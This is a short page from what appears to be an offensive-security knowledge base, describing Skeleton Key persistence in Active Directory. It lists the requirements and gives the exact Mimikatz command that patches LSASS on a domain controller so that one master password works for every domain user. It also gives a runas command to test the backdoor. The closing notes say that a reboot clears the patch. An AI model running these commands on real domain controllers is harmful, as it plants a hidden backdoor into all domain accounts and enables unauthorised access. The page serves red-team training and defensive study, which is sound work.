Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Persistence / Techniques

Skeleton Key

Skeleton Key persistence patches LSASS on a domain controller so a master password works for domain users while their real passwords still work. It is memory-only and usually disappears when the domain controller reboots, but it is high impact while active.

Requirements

Administrative execution on a domain controller.
Ability to interact with LSASS.
Mimikatz or equivalent tooling.

Apply Skeleton Key

mimikatz.exe "privilege::debug" "misc::skeleton" "exit"

Validate

runas /netonly /user:ootw\Administrator cmd

Use the Skeleton Key password when prompted.

mimikatz

Notes

  • Skeleton Key does not change user passwords in AD.
  • Existing passwords continue to work.
  • The master password works only while the DC LSASS patch remains active.
  • Rebooting the affected DC removes the patch, but the compromise that allowed it must still be investigated.